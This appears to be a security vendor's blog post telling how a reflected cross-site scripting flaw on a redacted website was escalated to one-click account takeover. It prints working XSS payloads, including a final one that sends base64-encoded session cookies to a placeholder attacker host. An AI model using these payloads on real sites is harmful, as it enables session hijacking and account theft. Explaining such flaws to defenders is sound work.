From Simple XSS to One Click Account Takeover
What is Cross sites scripting?
Cross site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. Sometimes, a small mistake, can lead to something huge, that can risk the entire business environment, and businesses don't know about it (Or don't pay enough attention).
This is one of those true stories.
So, while hunting for web application vulnerabilities in a huge website (Let's use redacted.com as that huge company).
Redacted.com has a big asset scope, more than 500 sub domains and internet connected devices which can be identified through various different techniques (SSL Certificate, Favicon, Dorking in various sites and so on, UltraRed system does this all automatically!)So, after gathering the entire scope of the target, I decided to crawl those websites, for any user input, for example, redacted.com had an option to search the page, which will result in the following link:https://redacted.com/?s=term.
I quickly tested every link gathered for any reflection, to basically see if there's any client input reflected on the website.
This can be done automatically, with several different tools, which will fuzz each parameter without any malicious content to not get blocked by WAF in early stage reconnaissance, but to see which character is being filtered on the website.
For example: if we type in the search box ‘Testing" 'with extra “ as a character, it will be sent like this URL encoded:https://redacted.com/?s=Testing”if " will be reflected on the page, that means there's a possible injection on the page.
Sometimes characters like [' ><] can also indicate a possible Cross site scripting, or even SQL Injection in some cases (Maybe that parameter is being sent to the database unsanitized? )
So, now that we finally found our parameter, we can start testing for Cross site scripting.
First test payload"><svg/onload=alert(1)> - NO POP UP.
Checking the source code to see where our code is being reflected, we can see that we're inside a Hidden input type, which means the variable is hidden, to trigger the XSS automatically we need to craft a payload that will escape the hidden input or close the previous script tag and create new tag.- "></scRiPt><sVG/onload=confirm(1)>- POP UP EXECUTED.
Cool, What now?
Well, here comes the big impact, alert is just a proof of concept that client side javascript can be executed, together with more misconfiguration in the website, we could perform One Click Account Take Over.
One click Account takeover, is a crafted link created by an attacker, to exploit a function on a website by sending the link to a target that uses the website, with one click only on the URL, the attacker can take over any account associated with the company in seconds, and ordinary protection methods such as 2FA or MFA would not suffice.
Final payload:- "</scRiPt><script>var i=new Image(); i.src="http://<ATTACKERURL.COM>/?cookie="+btoa(document.cookie);</script>- The payload sent the entire session cookie, private information and details about the account in BASE64 to the attacker.
With those cookies you can attack and take over any user who clicks the malicious link. To sum up, Cross site scripting is one of the most dangerous vulnerabilities in the web, and no wonder it is in the TOP 10 of OWASP Vulnerabilities.
Attackers with knowledge, and the right determination, can cause damage that would be hard to understand where it came from.
Ultrared knows to detect those Cross site scripting variables, and help clients keep their business intact.
ULTRA Eddie.